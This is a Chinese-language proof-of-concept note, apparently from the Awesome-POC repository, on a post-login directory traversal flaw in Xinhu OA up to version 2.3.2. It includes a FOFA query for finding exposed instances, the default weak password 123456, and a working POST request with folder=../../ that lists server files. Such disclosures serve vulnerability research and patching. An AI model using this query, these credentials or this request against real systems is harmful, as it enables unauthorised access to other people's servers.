Awesome-POC/OA产品漏洞/信呼OA beifenAction.php 后台目录遍历漏洞.md
2022-05-20 15:57:09 +08:00

45 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 信呼OA beifenAction.php 后台目录遍历漏洞
## 漏洞描述
信呼OA beifenAction.php文件中调用了 getfilerows方法导致了目录遍历漏洞攻击者通过漏洞可以获取服务器上的文件信息
## 漏洞影响
```
信呼OA <= 2.3.2
```
## FOFA
```
app="信呼协同办公系统"
```
## 漏洞复现
登录页面
![image-20220520133147020](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201331106.png)
其中默认存在几个用户存在弱口令 123456
![image-20220520133200310](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201332409.png)
存在漏洞的文件为 `webmain/system/beifen/beifenAction.php`
![image-20220520133212813](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201332896.png)
查看 `getfilerows()` 方法,在 `include/chajian/fileChajian.php`
![image-20220520133224646](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201332744.png)
该方法遍历目录下的文件名并输出,登录后,发送请求包
```
POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true
folder=../../
```
![image-20220520133237936](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201332997.png)